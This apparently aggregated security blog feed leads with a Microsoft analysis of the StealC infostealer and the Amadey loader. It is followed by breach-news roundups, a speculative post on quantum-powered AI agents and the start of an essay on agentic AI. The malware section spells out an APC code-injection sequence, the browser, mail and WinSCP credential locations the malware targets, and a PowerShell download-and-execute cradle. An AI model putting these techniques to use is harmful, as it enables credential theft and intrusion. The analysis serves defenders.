The post CNAPP evolution: How Microsoft aligns with leading cloud risk management platforms appeared first on Microsoft Security Blog.

Infostealers continue to be some of the most pervasive and impactful threats across the cybercrime ecosystem. They play a central role in intrusions, silently harvesting passwords, cookies, and session tokens before exfiltrating stolen data to attacker-controlled infrastructure. If not mitigated, these threats can turn a single consumer-device compromise into an enterprise risk: an infostealer infection on an employee’s personal device could yield corporate virtual private network (VPN) credentials, single sign-on (SSO) tokens, and session cookies that could allow an attacker to bypass multifactor authentication (MFA).  

In the cybercriminal ecosystem, infostealer families like StealC and malware delivery services like Amadey are sold and rented as commodities. Stolen data flows through an underground economy of access brokers that feeds ransomware and other operations. Because the initial infection usually happens outside managed endpoints, defenders might see the breach only after valid credentials are abused, underscoring the importance of identity protection, credential hygiene, and rapid response. 

In this blog, we examine how the infostealer economy has grown into a major threat to enterprise security, with a focus on StealC and Amadey. StealC is an infostealer that collects sensitive data from browsers, cryptocurrency wallets, messaging applications, email clients, and gaming platforms. It is a malware-as-a-service (MaaS) offering that threat actors use to generate customized payloads and manage stolen data through a centralized web panel. Meanwhile, Amadey is a MaaS loader that threat actors use to deliver StealC and other malware. Modular, pay-as-you-go models like StealC and Amadey allow threat actors to use a single initial infection to quickly escalate into multiple other threats.

On June 24, 2026, Microsoft’s Digital Crimes Unit (DCU), working with Europol and industry partners, announced a coordinated disruption action resulting in the takedown, suspension, and blocking of domains and command-and-control (C2) servers that formed the backbone of StealC and Amadey infrastructure. In total, DCU identified over 200 malicious Amadey and StealC command-and-control domains and IPs and moved to shut them down through a mix of court orders, domain seizures, registrations, and provider notifications.As part of this disruption, DCU engineered tools, including the use of Microsoft Copilot, to analyze StealC and Amadey binaries efficiently. These efforts included creating a prompt agent for performing comprehensive analysis of functions, using prompt engineering to generate a Python script for string decryption and extraction of configuration parameters, using Copilot to analyze disassembled malware code and identify C2 servers hardcoded into the malware binaries, and writing software with assistance from Copilot to confirm C2 activity.

The role of infostealers: From credential theft to intrusion

Infostealers like StealC, Lumma Stealer, RedLine, Raccoon, and Vidar enable division of labor across the cybercriminal ecosystem: initial operators deploy the malware at scale, and access brokers validate and monetize the stolen credentials, then resell them at a premium to threat actors seeking a foothold into enterprise environments.

When successfully deployed and executed, information-stealing malware can harvest credentials (usernames, passwords, and session cookies) from infected environments and export them as logs to the attackers’ server. These logs can hold credentials and tokens present on the compromised device, including corporate VPN, email, cloud, and SSO accounts. Stolen corporate credentials are extremely valuable, because a single working account can unlock many enterprise systems at once, especially if MFA could be bypassed using stolen session cookies. 

How an infostealer attack unfolds

While individual families differ in their tradecraft, infostealer-enabled intrusions follow a remarkably consistent path from delivery to impact. The infection chain could begin on an unmanaged or lightly protected device and end, often weeks later, inside a corporate environment, using credentials that look entirely legitimate.

Infostealer operators favor delivery techniques that scale and rely on ordinary user behavior rather than software vulnerabilities. The most common is deceptive web traffic: search engine optimization (SEO) poisoning and malicious advertising push fake or trojanized versions of popular software, “cracked” applications, and game cheats to the top of search results. A user looking for a free utility downloads a working program bundled with a stealer. A fast-growing variant is the ClickFix technique, in which a website tricks users into pasting a command into the Windows Run dialog or terminal, unknowingly executing the attacker’s script themselves, sidestepping many download-based defenses. Phishing email remains a reliable delivery path as well, particularly for campaigns that target specific organizations or individuals.

Lastly, infostealers are frequently delivered by other malware. Loaders like Amadey, upon establishing a foothold, deploy a stealer, a banking trojan, or additional tooling on demand. Once the loader unpacks the infostealer in memory and evades detection, the infostealer harvests target data. After exfiltrating stolen data, the malware typically deletes itself to hinder investigation. As we discuss in the next section, stolen credentials and tokens rarely stay with the original operator. These are packaged into logs and sold, validated by intermediaries, and eventually monetized as enterprise access, enabling account takeover, fraud, and ransomware.

How stolen credentials are monetized

Once exfiltrated, infostealer logs are rapidly monetized. Within hours, credentials from infected devices often appear on dark web markets or Telegram channels for USD $10-50 per log, while premium logs (with bank or corporate accounts) fetch higher prices, up to $100+ each. However, recent analysis by researchers at Reliaquest shows that Russian markets selling logs as low as $2 per log. These “breach packages” might be purchased in bulk by initial access brokers, specialized intermediaries who test and resell network access.

Alternatively, the operators who originally stole the logs themselves might directly exploit the high-value credentials without involving an access broker or buyer. For example, some ransomware groups deploy infostealers and then use the captured credentials to get inside target networks. The timeline for stolen infostealer credentials turning into enterprise breaches varies widely. Some intrusions occur within 48–72 hours of credentials being stolen, while other stolen credentials could sit dormant for months before they’re used by an attacker.

Infostealer infections often occur outside managed networks, for example, an employee’s home PC where corporate security monitoring is absent. The stolen sign-in reuse might not raise immediate alarms because attackers authenticate with legitimate credentials, even bypassing MFA if they have a session cookie. As a result, many compromised organizations only discover malicious activity after the attacker has taken action (for example, ransomware deployment or a large-scale data exfiltration event). This stealthy progression could make infostealer-driven intrusions a challenge to detect in time.

StealC: Infostealer for rent

StealC is representative of the modern malware-as-a-service stealer: threat actors rent access to a StealC builder to produce customized samples and a web panel to manage stolen data. This model keeps the barrier to entry low and the volume of distinct samples high. StealC is written in C++. Upon execution, it fingerprints the compromised system, collects saved credentials and cookies from a wide range of browsers, targets cryptocurrency wallets and messaging applications, captures data from email clients, steals Steam session data, takes screenshots of desktop, and exfiltrates credentials to its C2 server.

The malware also functions as a secondary loader, capable of downloading and executing additional payloads (.exe, MSI, or PowerShell scripts) on command from the C2. After completing its tasks, the malware can optionally self-delete to reduce forensic evidence. In addition, StealC queries the system’s default language and runs a language check, terminating itself if the locale matches Russian, Ukrainian, Belarusian, Kazakh, or Uzbek.

The malware attempts to create a Windows event using the victim ID as the event name. The victim ID format is <computer name>_<username>. If the event already exists, the malware enters a polling loop at intervals of less than five seconds (varies across variants) until the previous instance of itself completes. This is to avoid having multiple running instances on the device. StealC also contains an embedded expiration date. It compares the current system time against this expiration date and skips all malicious activity if the sample has expired.

C2 registration and configuration

StealC first sends a registration request to the C2 panel and constructs an HTTP POST request containing:

• Request type: create
• System hardware ID
• Malware build ID

This payload is RC4-encrypted using a hard-coded key, Base64-encoded, and then sent to the C2 through HTTP POST request. The decrypted C2 response is parsed as a JSON configuration object containing the following information:

• An access token used to authenticate all subsequent requests from the malware
• A list of browser stealing targets (paths, browser types, methods and types, which data to extract)
• A list of file-grabbing rules (target directories, file masks, size limits, recursion depth)
• Configuration flags controlling optional modules, including screenshot capture (take_screenshot), loader execution (loader), Steam theft (steal_steam), Outlook theft (steal_outlook), Foxmail theft (steal_foxmail), WinSCP theft (steal_winscp), and self-deletion (self_delete)

If this registration with C2 fails, the malware self-terminates immediately.

StealC performs a comprehensive collection of system information that is exfiltrated to the C2:

• Network information: IP address and country
• System identifiers: HWID, OS version and build number, system architecture
• User context: Username, computer name, running executable path
• Locale data: Local time, UTC offset, system language, installed keyboard layouts
• Hardware profile: CPU model, core and thread count, total RAM, battery/laptop detection
• Display configuration: Virtual screen resolution, monitor details (device name, adapter string, resolution, color depth)
• GPU information: Graphics adapter details
• Running processes: Full process list with names and PIDs enumerated through toolhelp snapshots
• Installed software: Application names and versions from the Uninstall registry keys for both all-users and current-user hives

Browser credential stealing

For Chromium browsers (like Chrome, Edge, Brave, Opera, Vivaldi, and others), the malware resolves the browser’s profile directory under %APPDATA% or %LOCALAPPDATA% and targets the following data stores:

• Sign-in data: saved user names and passwords
• Cookies: session cookies
• Web data: autofill entries and saved credit card information
• History: browsing history
• Local extension settings/Sync extension settings/IndexedDB: browser extension data (including cryptocurrency wallet extensions)

To defeat Chromium’s App-Bound Encryption (ABE), StealC does not decrypt these browser secrets within its own process. Instead, it carries an embedded payload (approximately 165 KB) that it injects into a sacrificial suspended process and executes through an asynchronous procedure call (APC). The injection sequence is as follows:

1. Spawns the target process with CreateProcessA using the CREATE_SUSPENDED flag
2. Allocates executable memory in the remote process with VirtualAllocEx (MEM_COMMIT, PAGE_EXECUTE_READWRITE).
3. Writes the embedded payload into that memory with WriteProcessMemory.
4. Queues the payload to the suspended thread with QueueUserAPC, then calls ResumeThread, so the APC fires and the payload runs in the process context
5. Waits for the injected code to finish with WaitForSingleObject, then frees the memory and closes the handles

Running in the target process context, the injected module performs the in-process decryption and writes the cleartext result to an inter process communication (IPC) file at C:\ProgramData\<HWID>.txt, where <HWID> is the victim hardware identifier. StealC then reads back up to 511 bytes of decrypted output from that file, processes the result, and deletes the temporary file. The routine retries the injection up to three times if it does not succeed.

The decrypted credential data is formatted as plaintext entries with fields for URL, login, and password, and is then exfiltrated to C2. For Firefox and other Gecko-based browsers (like Thunderbird, Waterfox, and others), the malware locates the profiles.ini to identify active browser profiles, then extracts data from the following:

• logins.json: stored credentials (hostname, encrypted user name, encrypted password)
• cookies.sqlite: session cookies
• formhistory.sqlite: form autofill data
• places.sqlite: browsing history and bookmarks

Additional credential theft activity

Beyond web browsers, StealC targets credentials saved by several desktop applications, processing each module in order and sending the results to the C2 as it completes them.

StealC enumerates Microsoft Outlook email account profiles stored in the registry under HKCU\Software\Microsoft\Office\<version>\Outlook\Profiles and HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles. It reads the account values for each profile, including the server settings and user names, and recovers the saved account passwords from their stored encrypted form so that mail server credentials (IMAP, POP3, and SMTP) could be exfiltrated.

The malware also targets the Foxmail email client. It locates the Foxmail data directory and parses account storage files (for example, the Accounts records under each account’s Storage folder). It then extracts the configured email addresses, server details, and saved passwords, decrypting Foxmail’s proprietary password encoding to recover the credentials in plaintext.

For the WinSCP File Transfer Protocol (FTP) and SSH FTP (SFTP) client, the malware collects saved session credentials from either the registry key HKCU\Software\Martin Prikryl\WinSCP 2\Sessions or, when portable storage is used, the WinSCP.ini file. For each session, it recovers the host name, user name, and password, reversing WinSCP’s custom password obfuscation so the stored credentials could be exfiltrated.

To perform file grabbing, the malware processes a list of rules received from the C2. Each rule specifies a target directory, file mask patterns, recursion depth, and optional size limits. The grabber uses recursive directory enumeration to walk the target path. Selected files are copied to a staging directory under C:\ProgramData and read into memory to be exfiltrated to C2. The temporary copy is then deleted.

If enabled in the C2 configuration, the malware specifically targets the Steam gaming application. First, it retrieves the Steam path from the registry key HKCU\SOFTWARE\Valve\Steam and then navigates to the configuration subdirectory inside and collects the following files:

• ssfn*
• config.vdf
• DialogConfig.vdf
• DialogConfigOverlay*.vdf
• libraryfolders.vdf
• loginusers.vdf

If enabled by the C2 configuration, the malware can also capture a full screenshot of the victim’s desktop using the following operations:

1. Obtains the virtual screen dimensions (spanning all monitors)
2. Performs a screen capture using a device context and bit-block transfer
3. Encodes the captured bitmap as a JPEG image at 90% quality
4. Exfiltrates the result

After data collection is complete, the malware contacts the C2 again with request type loaderwhile authenticating with the previously received access token. The C2 responds with a list of payloads to download and execute. The following three execution methods are supported:

• EXE execution: Downloads a file, saves it with an .exeextension, and executes the payload
• PowerShell cradle: Constructs a download-and-execute command (iwr <URL> |iex) and launches it through PowerShell
• MSI installation: Downloads a file, saves it with an .msi extension, and installs it silently through msiexec.exe /i “<path>” /passive

After all stealing modules have finished, the malware sends a final done notification to the C2 panel, including the access token. This signals to the operator that data collection for the compromised device is complete. All stolen data, such as system information, browser credentials, grabbed files, and screenshots, are transmitted in individual POST requests throughout the execution flow, each being RC4-encrypted and Base64-encoded. If the self-delete flag is set in the C2 configuration, the malware removes itself from disk as its final operation by executing the following command:

Amadey: Malware-as-a-service for delivery of infostealers

Active since at least 2018, Amadey operates as a malware-as-a-service (MaaS) that has been used as a delivery mechanism for downstream malware such as StealC, Lumma Stealer, remote access trojans (RATs), crypto miners, and, in some cases, ransomware.

In December of 2025, researchers at Trellix reported threat actors using the Amadey loader to retrieve the StealC infostealer from a compromised self-hosted GitLab instance, rather than from more familiar public hosting like GitHub. The point of that approach was to make the delivery infrastructure look more legitimate by using a long-established domain with valid TLS certificates, which can help the activity blend in and evade some traditional defenses.

This attack chain began with the first-stage Amadey loader. Once executed, the loader created a mutex to prevent duplication, performed discovery actions, and began communicating with its C2 server. Follow-on activities included the execution of additional components including a clipper plugin, use of PowerShell to expand archived payloads, deployment of additional payloads, and the execution of StealC, which communicated with its own separate C2 infrastructure after execution.

Amadey predates the current infostealer boom but has found renewed relevance as a delivery mechanism. It is a modular backdoor written in C++. It communicates with its C2 server over HTTP and supports backdoor commands for file download, file execution, command execution, modular updates, and network proxy. Operators can push plugins that add capabilities such as credential and clipboard theft, or simply use Amadey to download and run other malware, including infostealers. 

Scheduled task persistence

Upon execution, Amadey attempts to copy itself to the file nudwee.exe in the following target directory, depending on the system:

• On Windows 10 or Windows 11: C:\Users\<user name>\e079729711
• Others: %TEMP%\e079729711

After copying its own executable to this path, the malware executes it before creating a scheduled task to establish persistence for the payload.

System information collection

The malware builds a victim fingerprint POST request body with the following fields:

This body is then RC4-encrypted and hex-encoded and later sent to C2 during the C2 bot registration phase.

The malware continues its infection by querying the system registry for keyboard layouts. The malware specifically checks for the following layout IDs:

• 00000419: Russian
• 00000422: Ukrainian
• 00000423: Belarusian

This sets up an internal flag, which is checked before executing certain commands to skip certain functionalities like credential stealing and clipboard stealing.

C2 communication

The malware communicates with its C2 serverover HTTP. In the first phase, the malware performs a status check by sending “st=s“in an HTTP POST request to C2. The C2 server responds with a sleep multiplier, which is a value to specify how long the malware sleeps between command execution.

In the next phase, the malware performs bot registration by sending the RC4-encrypted victim information to the C2. Once this is complete, the C2 starts sending backdoor commands to the Amadey backdoor. After each backdoor command is executed, the malware sleeps for the specified duration before receiving a new backdoor command. All communications between the malware and its C2 infrastructure are encrypted using RC4, with the encryption key embedded in the malware’s configuration.

The following table lists the backdoor commands that Amadey could process and their descriptions:

Plugins like cred.dll and clip.dll are downloaded from the C2 server at runtime.

In the generic handler used by commands 0x0A, 0x0C, 0x1B, 0x1C, 0x1D, the C2 can specify one of these in the backdoor data for the payload drop location:

Defending against StealC and Amadey intrusions

To defend against attacks from infostealers like StealC and malware families like Amadey, Microsoft recommends the following mitigation measures:

• Read the human-operated ransomware threat overview for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
• Turn on tenant-wide tamper protection features to prevent attackers from stopping security services or using antivirus exclusions. Without tamper protection, attackers could simply turn off Microsoft Defender Antivirus without the need to acquire higher privileges.
  • Customers running Intune or Microsoft Defender for Endpoint Security Configuration can enable DisableLocalAdminMerge to prevent modification of antivirus exclusions via GPO.
  • In addition to tamper protection, you can also enable and configure Microsoft Defender Antivirus always-on protection in Group Policy.
  • If there is an issue with a device during roll out of various antivirus features, the device can be placed in troubleshooting mode to turn off tamper protection temporarily without impacting the wider organizational security policy.
• Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent several of the infection vectors of this threat. These rules, which can be configured by any user, offer significant hardening against targeted attacks. In observed attacks, Microsoft customers who had the following rules turned on could mitigate the attack in the initial stages and prevent hands-on-keyboard activity:
  • Use advanced protection against ransomware

Microsoft Defender detections

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Microsoft Security Copilot

Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.

Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:

• Threat Intelligence Briefing agent
• Phishing Triage agent
• Threat Hunting agent
• Dynamic Threat Detection agent

Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

• Tool profile: Amadey
• Tool profile: StealC
• Tool profile: Lumma Stealer
• Tool profile: Information stealers

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Indicators of compromise

References

• Amadey Exploiting Self-Hosted GitLab to Distribute StealC Trellix
• HELLCAT Ransomware Group Strikes Again: Four New Victims Breached via Jira Credentials from Infostealer Logs InfoStealers by HudsonRock
• The Infostealer Pipeline How Russian Market Fuels Credential Based Attacks ReliaQuest
• Stealer Logs and Corporate Access Flare

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them appeared first on Microsoft Security Blog.

Critical Vulnerabilities in libssh2 SSH Library Enable Remote Code Execution

A major security flaw (CVE-2026-55200) was disclosed in the widely used libssh2 library, scoring a critical 9.2 CVSS. It involves an out-of-bounds write (stemming from integer overflow issues in earlier versions like 1.11.1 and below), potentially allowing attackers to execute arbitrary code via malicious SSH packets.

libssh2 is embedded in millions of systems for secure remote access. The vulnerability affects SSH connections and could lead to full system compromise if exploited. Patches are available (e.g., via GitHub commit), and organizations should update immediately, audit SSH dependencies, and monitor for exploitation attempts. This highlights ongoing risks in foundational open-source libraries.

New Prinz Eugen Ransomware Prioritizes Recent Files for Maximum Impact

Security researchers identified Prinz Eugen, a polished Go-based ransomware that stands out for its targeted encryption strategy: it prioritizes recently modified files (processing alphabetically on ties) to hit active, business-critical data first. It uses ChaCha20-Poly1305 encryption, employs anti-forensic techniques (e.g., wiping keys from memory and self-deletion), and skips traditional ransom notes in favor of out-of-band extortion.

Intrusions often start with compromised RDP credentials. This evolution pressures victims harder by focusing on fresh data. Defenses include robust backups (air-gapped/offline), endpoint detection, and monitoring for anomalous encryption patterns.

Tata Electronics Ransomware Breach Exposes Apple and Tesla Supply Chain Data

Tata Electronics (a key supplier for Apple iPhone assembly and Tesla components) confirmed a cybersecurity incident. The World Leaks ransomware group allegedly posted over 200,000 files (~630 GB), including confidential Apple manufacturing docs, Tesla engineering files, employee passports, factory details, and more. Tata activated response protocols with no reported operational disruption; Apple is investigating.

This underscores persistent supply chain risks—third-party vendors remain high-value targets. Lessons: enforce strict vendor security requirements, segment supply chain access, monitor for data leaks on dark web forums, and prioritize zero-trust architectures.

Klue Supply Chain Attack via OAuth Tokens Hits Salesforce Customers

Attackers compromised Klue (a competitive intelligence platform) using a legacy credential, stole OAuth tokens for integrations (especially Salesforce), and exfiltrated CRM data from multiple customer environments. Salesforce disabled the Klue Battlecards integration to contain it. The Icarus group claimed responsibility in an extortion campaign. Cybersecurity firms were among those impacted.

This supply-chain OAuth abuse bypassed MFA and highlights third-party integration dangers. Recommendations: review/revoke unnecessary OAuth apps, implement token monitoring and least-privilege access, and audit legacy credentials regularly.

These incidents reflect broader trends: exploitation of core libraries, sophisticated ransomware, supply chain attacks, and credential/integration abuses. Stay vigilant with patching, monitoring, backups, and zero-trust principles.

In the world of AI agents, we’ve come a long way from simple chatbots that occasionally hallucinate your grocery list. Today’s agents can plan trips, debug code, and even triage security incidents. But throw in exponentially complex real-world problems – like optimizing global supply chains in real time, coordinating swarms of autonomous vehicles during rush hour, or running multi-variable strategic simulations for cybersecurity defense – and even the beefiest classical supercomputers start sweating binary bullets.

Enter quantum supremacy: the point where quantum processors demonstrably outperform classical ones on certain tasks. When this power fuses with AI agents, we’re not just getting faster computers. We’re unlocking a new era of autonomous decision-making that operates at scales and speeds previously reserved for science fiction.

The Quantum Edge for AI Agents

Classical computers process information in bits – strict 0s and 1s. Quantum processors use qubits that can exist in superposition (both 0 and 1 simultaneously), entangle with each other, and leverage interference for massive parallelism. This isn’t hype for tomorrow’s headlines; it’s grounded in principles already demonstrated in labs (think Google’s Sycamore or IBM’s latest Eagle/Heron processors hitting supremacy milestones).

For AI agents, this translates to game-changing capabilities in:

• Planning and Optimization at Scale: Problems like the Traveling Salesman or vehicle routing become brutally hard as variables grow (NP-hard territory). Quantum algorithms such as QAOA (Quantum Approximate Optimization Algorithm) or quantum annealing can explore vast solution spaces in parallel. An AI agent powered by quantum hardware could optimize fleet logistics for thousands of delivery drones in real time, factoring in weather, traffic, fuel, and even dynamic rerouting due to sudden disruptions – all without breaking a sweat (or overheating a data center).

• Real-Time Decision Making Under Uncertainty: Classical reinforcement learning agents struggle with combinatorial explosions in multi-agent environments. Quantum-enhanced agents could maintain probabilistic models natively via superposition, evaluating thousands of “what-if” scenarios simultaneously. Imagine a cybersecurity AI agent that doesn’t just detect threats but quantum-simulates adversarial attack paths across an entire enterprise network, predicting and neutralizing moves before they materialize.

• Exponentially Complex Simulations: Training large models or running agent swarms for climate modeling, drug discovery, or financial risk assessment involves mind-boggling permutations. Quantum processors excel at simulating quantum systems themselves (a natural fit) and could supercharge hybrid quantum-classical AI frameworks. Agents could handle real-time optimization for smart grids balancing renewable energy sources, or coordinate AI-driven negotiations in global trade with near-perfect foresight.

The result? Autonomous agents that don’t just react – they anticipate and orchestrate at scales where classical limits force approximations or delays.

Why This Matters Now (And Why It’s Still “Potential”)

We’re not plugging a quantum chip into your laptop tomorrow. Challenges remain: error correction (qubits are noisy), scalability, integration with classical AI stacks, and the sheer cryogenic requirements for many quantum systems. Hybrid approaches – where quantum co-processors handle the hard optimization subroutines while classical systems manage the rest – are the realistic near-term path.

Yet the trajectory is clear. Companies like Microsoft (with Azure Quantum), Google, IBM, and startups in quantum ML are already bridging the gap. AI agents in security, logistics, healthcare, and finance stand to benefit first. For those of us in tech (especially Microsoft ecosystem watchers), tools like quantum-inspired optimization in Azure or integration with Copilot-like agents could redefine what’s possible.

Picture this: Your AI SOC analyst agent doesn’t just triage an incident – it quantum-optimizes the entire response playbook across global infrastructure in seconds. Or a personal agent that plans your family’s vacation and optimizes your investment portfolio for the trip’s cost, all while accounting for 10,000 variables you didn’t even know existed.

The Road Ahead: Hype vs. Reality

Quantum supremacy for AI agents won’t solve every problem (Grover’s algorithm gives quadratic speedups for search, not magic wands), but for the right class of exponential bottlenecks, it’s transformative. Ethical considerations loom large – faster decisions mean faster unintended consequences if not governed well. Alignment, transparency, and human oversight remain non-negotiable.

As quantum hardware matures and error rates drop, expect a Cambrian explosion in agent capabilities. The agents of 2030 might look back at today’s LLMs the way we view 1990s dial-up modems.

In the meantime, keep an eye on quantum-cloud integrations and hybrid frameworks. The future of autonomous intelligence isn’t just bigger models – it’s weirder, entangled, and supremely efficient.

What do you think – ready to entangle your workflows with qubits, or sticking with classical for now? Drop your thoughts in the comments, and stay tuned for more on AI agents, quantum tech, and the wild intersections ahead.

FortiBleed Campaign: Credential Harvesting Hits ~75,000 Fortinet Devices Worldwide

A large-scale campaign dubbed FortiBleed has exposed valid administrative and SSL VPN credentials for tens of thousands of Fortinet FortiGate firewalls and VPN gateways. Researchers identified a dataset covering approximately 73,932–75,000 unique devices across 194 countries and over 21,600 domains, impacting government, critical infrastructure, healthcare, finance, and other sectors.

Threat actors systematically extracted configuration files from internet-facing devices and cracked stored credential hashes. This isn’t tied to a new zero-day vulnerability but to ongoing exploitation of misconfigurations and weak practices. Roughly half of all internet-exposed FortiGate devices may be affected.

Implications and Advice: Organizations should immediately audit FortiGate exposure (via tools like Shodan), rotate all credentials, enable multi-factor authentication (MFA) where possible, and apply the latest patches. Monitor for unauthorized access. Global agencies have issued warnings, and active exploitation is confirmed in underground forums.

This highlights the persistent risks of edge devices and the need for robust credential hygiene beyond just patching.

Texas Parks & Wildlife Department Data Breach: 3 Million Texans Affected

Texas Parks & Wildlife Department (TPWD) disclosed a breach involving a third-party vendor handling hunting and fishing licenses. Hackers accessed personal data for over 3 million individuals, including driver’s license information, passport numbers (if provided), email addresses, phone numbers, and residential addresses. No Social Security numbers, dates of birth, or financial data were compromised.

Texas Cyber Command detected the incident. Affected individuals are offered free credit monitoring. This ranks as one of the larger state-level breaches reported recently in the U.S.

Implications and Advice: Third-party vendor risks remain a major vector. Individuals should monitor accounts for suspicious activity, use credit freezes if needed, and be wary of phishing leveraging this data. Organizations: Vet vendors rigorously and enforce strict data-sharing controls.

Klue Supply Chain Attack: Cybersecurity Firms Lose Salesforce Data

Hackers (linked to the Icarus group) compromised Klue, a market intelligence platform integrated with Salesforce. They stole OAuth tokens, enabling access to customer Salesforce instances. Victims include cybersecurity companies like Huntress, Recorded Future, and others (e.g., HackerOne, Jamf, Snyk). Stolen data includes business contacts, sales quotes, and related messaging—no core product or customer operational data from the victims’ main systems was directly hit.

This is part of a pattern of compromising integrated apps to drain Salesforce CRMs.

Implications and Advice: Supply chain and third-party integration risks are escalating, even for security vendors. Review all OAuth/app integrations, revoke unnecessary tokens, monitor for anomalous Salesforce activity, and demand transparency from vendors. Huntress and others have shared detailed incident reports.

Colossal 24 Billion Records Exposure: Infostealer Logs and More

Cybernews researchers discovered a publicly exposed Elasticsearch database (~8.3 TB) containing approximately 24 billion records with usernames, emails, plaintext passwords, and login URLs. Compiled from 36 sources (infostealer malware logs, Telegram channels, breach compilations), it includes recent data up to early 2026. Much of it stems from credential-harvesting malware.

The sheer volume makes it dangerous for account takeover campaigns, especially without MFA.

Implications and Advice: Assume your data may be in such dumps. Use unique, strong passwords (or a password manager), enable MFA everywhere, monitor for breaches via services like Have I Been Pwned, and change passwords proactively for critical accounts. This underscores the scale of infostealer threats.

These stories reflect ongoing themes: credential abuse, supply chain vulnerabilities, third-party risks, and the flood of stolen data. Stay vigilant with patching, MFA, monitoring, and zero-trust principles.

NOTE: This blog post was coordinated and composed using Chervil - the agentic, conversational web browser.

For the full effect, get the PDF version of this post that was also composed by Chervil.

Table of Contents

1. The Illusion of Progress

2. The Generational Gap Nobody Talks About

3. The Prompt Ceiling: Where GenAI Stops and Real Work Begins

4. The Hidden Cost of Standing Still

5. What Agentic AI Actually Looks Like

6. The AI Maturity Ladder

7. The Psychology of Prompt Comfort

8. Dismantling the Objections

9. A Practical Roadmap: From Prompts to Agents

10. The Future Belongs to the Orchestrators

11. Conclusion: The Clock Is Running

There is a photograph making the rounds in certain venture capital circles. It shows a textile worker in the early 1900s, hunched over a loom, working with breathtaking skill and speed. The photograph is meant to be poignant — because just outside the frame, a power loom is being installed that will render her specialty obsolete not in a generation, but in a season. She is excellent at what she does. She is also, tragically, refining a skill at the precise moment it stops mattering.

That image keeps coming to mind when I watch organizations approach artificial intelligence in 2025. Millions of people have discovered that they can type a question into a large language model and receive an answer that would have taken hours of research, drafting, and editing to produce manually. That is a genuine and meaningful productivity gain. But it is also, in the longer arc of what is happening, the equivalent of learning to operate a slightly faster hand loom while power looms are being bolted to the factory floor across town.

The organizations that will dominate the next decade are not the ones with the best prompt engineers. They are the ones that have moved past prompts entirely — into the realm of autonomous AI agents, multi-step workflows, tool-using models, and orchestrated systems that act, decide, and iterate without waiting for a human to type the next question. The gap between those two groups is widening every quarter, and for companies still stuck in “ask-and-answer” mode, the reckoning is coming faster than anyone wants to admit.

This is the story of that gap — why it exists, why it persists, what it costs, and, most urgently, how to close it before it closes on you.

1. The Illusion of Progress

Let’s start by giving credit where it’s due. The widespread adoption of generative AI tools — ChatGPT, Claude, Gemini, Copilot, and their dozens of specialized cousins — represents a real and measurable step forward for knowledge work. Studies have shown meaningful productivity lifts for writers, coders, analysts, and customer service agents when they use these tools well. The tools are genuinely impressive. The energy around them is not entirely hype.

But here is the subtle trap embedded in that genuine progress: it creates the feeling of transformation without the substance of it. When an employee uses ChatGPT to draft a report in 20 minutes instead of two hours, they feel the thrill of leverage. When a marketing team generates 50 ad copy variations in an afternoon instead of a week, they feel the exhilaration of scale. Leadership sees the activity, hears the enthusiasm, and marks “AI adoption” off the strategic checklist.

This is the illusion of progress. The work is still fundamentally human-initiated, human-directed, and human-completed. The AI is a tool that responds to requests. It does not initiate. It does not remember, plan, monitor, coordinate, or persist. The moment the conversation window closes, the intelligence evaporates. Nothing was built. No process was changed. The workflow tomorrow looks exactly like the workflow today, only with a chat interface wedged into the middle of it.

Compare that to what is already happening in the organizations that have moved to the next stage. They are running AI agents that autonomously monitor customer churn signals and draft intervention emails without a human request. They are deploying coding agents that write, test, deploy, and debug software across multi-file codebases over hours-long sessions. They are orchestrating research pipelines that browse the web, synthesize sources, identify contradictions, and produce verified intelligence reports — all while the team sleeps. The gap between prompt users and agent deployers is not a gap of sophistication. It is a gap of category.

2. The Generational Gap Nobody Talks About

The AI landscape has evolved through distinct epochs, and understanding those epochs is crucial to understanding why so many organizations are stuck. The first era was the era of prediction — narrow models trained to do one thing very well: classify images, recommend content, detect fraud. These systems were powerful but rigid, deployed by data science teams and invisible to most employees.

The second era — the one we are currently saturated in — is the era of generation. Large language models that can generate plausible, fluent, often brilliant text, code, and analysis in response to a prompt. This era democratized AI. Suddenly anyone with a browser could have a conversation with a model that seemed to understand them. The adoption curve was unlike anything the software industry had seen before. ChatGPT reached 100 million users faster than any application in history. Whole new job titles were born. “Prompt engineering” became a LinkedIn skill. Corporate training programs sprang up to teach employees how to phrase their requests.

But while that frenzy was happening, the third era was already beginning to take shape: the era of agency. This is the shift from AI that responds to AI that acts. Models that can use tools — browse the web, write and execute code, call APIs, read and write files, send emails, manage calendars, query databases, spawn sub-agents to handle subtasks, and loop back to verify their own outputs. These are not chatbots. They are autonomous software workers. And the distance between a chatbot and an autonomous software worker is roughly the distance between a calculator and a computer.

